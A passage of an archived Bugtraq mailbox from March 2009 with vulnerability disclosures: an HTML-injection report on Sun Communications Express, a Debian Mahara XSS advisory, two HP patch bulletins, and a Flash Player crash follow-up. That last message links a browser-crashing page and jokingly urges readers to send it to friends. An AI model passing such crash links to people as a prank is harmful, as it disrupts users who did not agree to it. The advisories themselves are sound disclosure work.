n/Q5RjGvgFewUI9/uvVmrklaV+EkKjbD79w0ksHGxXilkuGNXsH1oQZgEvbWumgN
Cyuz2s167wkjsqDDm9kAp0ijbyBXQ3ogffN+42sKtKn3+1QRMB+0kdHBjdmSAyrx
j8Y/CqzVWgQXR0QbE37kgK/hd+0oKKwoTGQeSa2eB0r6xgJmFsJnZADjh+LVFYd2
f3whQ3N68oZTIPjDwKt5/UUyXIA6tZLt7SYd4R+VjqlSglLjrICpVjysNtVWkVm6
bdwDjn4fbYjfpJhCKg3CdKcVzG/lvo2zES5+d6sREFEH3qxyMKXqEdnJ3rLq9xQ=ubas
-----END PGP SIGNATURE-----
From - Wed Mar 11 10:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068bb
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39710-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F1B9BED880
for <lists@securityspace.com>; Wed, 11 Mar 2009 10:51:10 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1CCD2143F5A; Wed, 11 Mar 2009 07:46:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30397 invoked from network); 10 Mar 2009 20:43:01 -0000
Date: Tue, 10 Mar 2009 15:16:51 -0600
Message-Id: <200903102116.n2ALGpka023556@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: sosoblood@hotmail.com
To: bugtraq@securityfocus.com
Subject: Sun Java System Communications Express [HTML Injection]
Status:
Hello,
I have found a HTML Injection vulnerability in Sun Java� System Communications Express, a web client that provides an integrated web-based communication and collaboration client to the Sun Java Communications Suite. It consists of three client modules - Calendar, Address Book, and Mail.
Here is a screen-shot that demonstrates the vulnerability:
http://sosoblood.freehostia.com/SJSC/html_injection.gif
As we can see in the picture, I was able to inject some HTML and make my name in bold at the header of the page. Also, I was able to inject an image in the test message subject that I sent to myself.
One can also inject an IFRAME or any HTML tag.
However, the potential threat is limited by the limited characters size of some fields like the "Full Name" at the header of the page and the "Subject" of a message. So injecting long strings is impossible.
A solution for this vulnerability is implemented by using the htmlentities() function.
Thank you for reading.
Edgard Chammas [454447415244].
From - Wed Mar 11 12:01:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068bf
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39709-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 4A83BED87B
for <lists@securityspace.com>; Wed, 11 Mar 2009 11:52:10 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A093F143D71; Wed, 11 Mar 2009 07:45:53 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28261 invoked from network); 10 Mar 2009 20:00:19 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Tue, 10 Mar 2009 21:33:38 +0100
From: Steffen Joeris <white@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090310203338.GA5090@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.237.55
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-7.88 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MDO_BAD_WORD1=2.8,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level:
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1736-1] New mahara packages fix cross-site scripting
Priority: urgent
Resent-Message-ID: <P_Os1a81cAO.A.baD.56stJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Tue, 10 Mar 2009 20:34:01 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1736-1 security@debian.org
http://www.debian.org/security/ Steffen Joeris
March 10, 2009
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : mahara
Vulnerability : insufficient input sanitising
Problem type : remote
Debian-specific: no
CVE ID : CVE-2009-0660
It was discovered that mahara, an electronic portfolio, weblog, and
resume builder, is prone to cross-site scripting attacks, which allows
the injection of arbitrary Java or HTML code.
For the stable distribution (lenny), this problem has been fixed in
version 1.0.4-4+lenny1.
The oldstable distribution (etch) does not contain mahara.
For the testing distribution (squeeze) and the unstable distribution
(sid), this problem will be fixed soon.
We recommend that you upgrade your mahara package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.dsc
Size/MD5 checksum: 1303 e78e2f84879067ead786f022b3fb9e65
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.diff.gz
Size/MD5 checksum: 38565 dab9ae59c86acc880749118e0c7fab20
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4.orig.tar.gz
Size/MD5 checksum: 2383079 cf1158e4fe3cdba14fb1b71657bf8cc9
Architecture independent packages:
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1_all.deb
Size/MD5 checksum: 1636658 52d68deb52604b9d5ae0ad910ef0ef78
http://security.debian.org/pool/updates/main/m/mahara/mahara-apache2_1.0.4-4+lenny1_all.deb
Size/MD5 checksum: 7778 9b1ddde46afd38972b0789e0c18e740a
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkm2zjoACgkQXm3vHE4uylp99ACdGLxX5QiuHmIP5ugO8mvWtuXT
HzcAoM0ifVwpizr87+vJt9XxqI8dLBPV
=R8Rx
-----END PGP SIGNATURE-----
From - Wed Mar 11 12:11:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068c0
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39714-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 24897ED87B
for <lists@securityspace.com>; Wed, 11 Mar 2009 12:06:39 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6B2BA143BE0; Wed, 11 Mar 2009 08:39:56 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14636 invoked from network); 11 Mar 2009 14:54:50 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities
Date: Wed, 11 Mar 2009 08:20:52 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090311152052.841D7BF7E@hpchs.cup.hp.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01683026
Version: 1
HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-03-09
Last Updated: 2009-03-09
Potential Security Impact: Mulitple remote vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS)
References: SUNALERT ID: 244988 (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340, CVE-2008-5341, CVE-2008-5342, CVE-2008-5343, CVE-2008-5344), 246387 (CVE-2008-5345), 246366 (CVE-2008-5347), 246346 (CVE-2008-5348), 246266 CVE-2008-5350), 245246 (CVE-2008-5351), 244991 (CVE-2008-5353), 244990 (CVE-2008-5354), 244987 (CVE-2008-5356, CVE-2008-5357, CVE-2008-5358, CVE-2008-5359), 244986 (CVE-2008-5360)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier
HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
==============================================Reference Base Vector Base Score
CVE-2008-2086 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5339 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2008-5340 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2008-5341 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2008-5342 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2008-5343 (AV:N/AC:L/Au:N/C:C/I:P/A:P) 9.0
CVE-2008-5344 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5345 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5347 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5348 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1
CVE-2008-5350 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2008-5351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5353 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2008-5354 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5356 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5357 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5358 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5359 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5360 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities
The upgrades are available from the following location:
http://www.hp.com/go/java
HP-UX B.11.31
JDK and JRE v6.0.03 or subsequent
JDK and JRE v5.0.15 or subsequent
SDK and JRE v1.4.2.21 or subsequent
HP-UX B.11.23
JDK and JRE v6.0.03 or subsequent
JDK and JRE v5.0.15 or subsequent
SDK and JRE v1.4.2.21 or subsequent
HP-UX B.11.11
JDK and JRE v6.0.03 or subsequent
JDK and JRE v5.0.15 or subsequent
SDK and JRE v1.4.2.21 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0.02 and earlier, update to Java v6.0.03 or subsequent.
For Java v5.0.14 and earlier, update to Java v5.0.15 or subsequent.
For Java v1.4.2.20 and earlier, update to Java v1.4.2.21 or subsequent.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
==========Jdk14.JDK14-COM
Jdk14.JDK14-IPF32
Jdk14.JDK14-IPF64
Jdk14.JDK14-PA11
Jdk14.JDK14-PA20
Jdk14.JDK14-PA20W
Jre14.JRE14-COM
Jre14.JRE14-IPF32
Jre14.JRE14-IPF32-HS
Jre14.JRE14-IPF64
Jre14.JRE14-IPF64-HS
Jre14.JRE14-PA11
Jre14.JRE14-PA11-HS
Jre14.JRE14-PA20
Jre14.JRE14-PA20-HS
Jre14.JRE14-PA20W
Jre14.JRE14-PA20W-HS
action: install revision 1.4.2.21.00 or subsequent
Jdk15.JDK15-COM
Jdk15.JDK15-PA20
Jdk15.JDK15-PA20W
Jdk15.JDK15-IPF32
Jdk15.JDK15-IPF64
Jre15.JRE15-COM
Jre15.JRE15-PA20
Jre15.JRE15-PA20-HS
Jre15.JRE15-PA20W
Jre15.JRE15-PA20W-HS
Jre15.JRE15-IPF32
Jre15.JRE15-IPF32-HS
Jre15.JRE15-IPF64
Jre15.JRE15-IPF64-HS
action: install revision 1.5.0.15.00 or subsequent
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
action: install revision 1.6.0.03.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 9 March 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
�Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSbZgP+AfOvwtKn1ZEQLqWgCgpK0tTDWGRJkDVpWzhFqI3asVAsMAnjKq
R3jvTn4bcr1e7cmNVRj6zNp+
=8OKZ
-----END PGP SIGNATURE-----
From - Wed Mar 11 13:41:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068c2
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39713-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C0284ED879
for <lists@securityspace.com>; Wed, 11 Mar 2009 13:35:51 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 15EF8143A0C; Wed, 11 Mar 2009 08:39:24 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14293 invoked from network); 11 Mar 2009 14:46:19 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access
Date: Wed, 11 Mar 2009 08:20:07 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090311152008.4454FBF78@hpchs.cup.hp.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01655638
Version: 1
HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-03-09
Last Updated: 2009-03-09
Potential Security Impact: Remote unauthorized access to data, local unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with WMI Mapper for HP Systems Insight Manager running on Windows. The vulnerabilities could be exploited remotely to allow unauthorized access to data or locally to gain unauthorized access.
References: CVE-2009-0712, CVE-2009-0713
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
WMI Mapper for HP Systems Insight Manager prior to v2.5.2.0
BACKGROUND
CVSS 2.0 Base Metrics
==============================================Reference Base Vector Base Score
CVE-2009-0712 (AV:L/AC:L/Au:S/C:C/I:C/A:N) 6.2
CVE-2009-0713 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following software patch to resolve the vulnerability.
The patch can be downloaded from
http://www.hp.com/bizsupport/
WMIMapper2_6_0.msi or subsequent
PRODUCT SPECIFIC INFORMATION
None
HISTORY
Version:1 (rev.1) - 9 March 2009 Initial release
Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
�Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSbUbhuAfOvwtKn1ZEQJkFwCdHGcxKKJ05owJj9iPwE0yXFZrNqMAn2Bu
wmU0rQ9+y4JnT3C3/Joa2cBr
=pfZN
-----END PGP SIGNATURE-----
From - Wed Mar 11 17:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068fd
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39717-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 66478ED879
for <lists@securityspace.com>; Wed, 11 Mar 2009 17:44:45 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 681BF236F46; Wed, 11 Mar 2009 14:39:45 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27687 invoked from network); 11 Mar 2009 17:38:06 -0000
MIME-Version: 1.0
In-Reply-To: <f1dcfaef0810011746paa14f6dta648aa5221b72ec5@mail.gmail.com>
References: <f1dcfaef0810011746paa14f6dta648aa5221b72ec5@mail.gmail.com>
Date: Wed, 11 Mar 2009 10:30:49 -0700
Message-ID: <f1dcfaef0903111030y5aefdb48o218689a260adbee6@mail.gmail.com>
Subject: Re: Adobe Flash Player plug-in null pointer dereference and browser
crash
From: Matthew Dempsky <matthew@mochimedia.com>
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Status:
On Wed, Oct 1, 2008 at 5:46 PM, Matthew Dempsky <matthew@mochimedia.com> wrote:
> If a Flash 9 SWF loads two SWF files with different SWF version
> numbers from two distinct HTTP requests to the exact same URL
> (including query string arguments), then Adobe's Flash Player plug-in
> will try to dereference a null pointer. �This issue affects at least
> versions 9.0.45.0, 9.0.112.0, 9.0.124.0, and 10.0.12.10 on Windows, OS
> X, and Linux.
As an update, this issue also affects 10.0.22.87 at least on Windows
and OS X. I've seen some Linux distributions (e.g., [1]) claim that
10.0.22.87 fixes this bug (aka CVE-2008-4546), but I think this is
mistaken.
You can easily reproduce this bug (i.e., crash your browser) by
visiting
http://flashcrash.dempsky.org/. Be sure to tell your
friends: it can be the next Rick Roll.
[1]
http://www.gentoo.org/security/en/glsa/glsa-200903-23.xml?style=printable
--
Matthew Dempsky
http://www.mochimedia.com
From - Wed Mar 11 18:11:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068fe
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39716-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6AE3BED879
for <lists@securityspace.com>; Wed, 11 Mar 2009 18:02:08 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E781714379E; Wed, 11 Mar 2009 14:39:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18773 invoked from network); 11 Mar 2009 16:49:32 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <nion@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
